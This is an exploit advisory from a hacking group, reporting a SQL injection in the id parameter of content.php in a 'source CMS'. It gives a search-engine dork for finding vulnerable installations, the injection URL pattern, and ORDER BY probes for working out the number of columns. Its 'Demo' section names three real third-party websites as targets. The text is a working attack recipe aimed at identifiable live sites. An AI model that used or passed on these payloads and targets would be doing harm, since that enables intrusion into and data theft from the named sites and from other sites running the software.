Source CMS suffers from a remote SQL injection vulnerability.
79b3712cd4d46a746e6e373928813d3bb4c12657dbdfd1e1fecc9438702f9c46
########################################################################################
# #
# Exploit Title : source CMS SQL Injection Vulnerability #
# #
# Author : Secure-Land Security Team #
# #
# Discovered By : farbodmahini #
# #
# Home : Secure-Land.net #
# #
# Vendor : www.source.com.hk #
# #
# Contact : farbodmahini@yahoo.fr , farbodmahini@gmail.com #
# #
# Security Risk : High #
# #
# DorK : "powered by the source" #
# #
# #
########################################################################################
# #
# Expl0iT: #
# #
# http://[TarGeT]/content.php?id=[sqli] #
# #
# #
# Test SQL Injection in MYSQL Version : #
# #
# #
# False #
# #
# http://[TarGeT]/content.php?id=1+order+by+9-- #
# #
# True #
# #
# http://[TarGeT]/content.php?id=1+order+by+8-- #
# #
# Demo : #
# #
# http://www.mangano.ch/content.php?id=[sqli] #
# http://www.cbline.ch/content.php?id=[sqli] #
# http://www.vinsdemorges.ch/content.php?id=[sqli] #
# #
########################################################################################
# #
# Special Thanks : 2MzRp-Mikili-M.Prince-0x0ptim0us #
# #
########################################################################################
# #
# Greetz : All Secure-Land Members - Packetstorm - 1337day - exploit-id #
# #
########################################################################################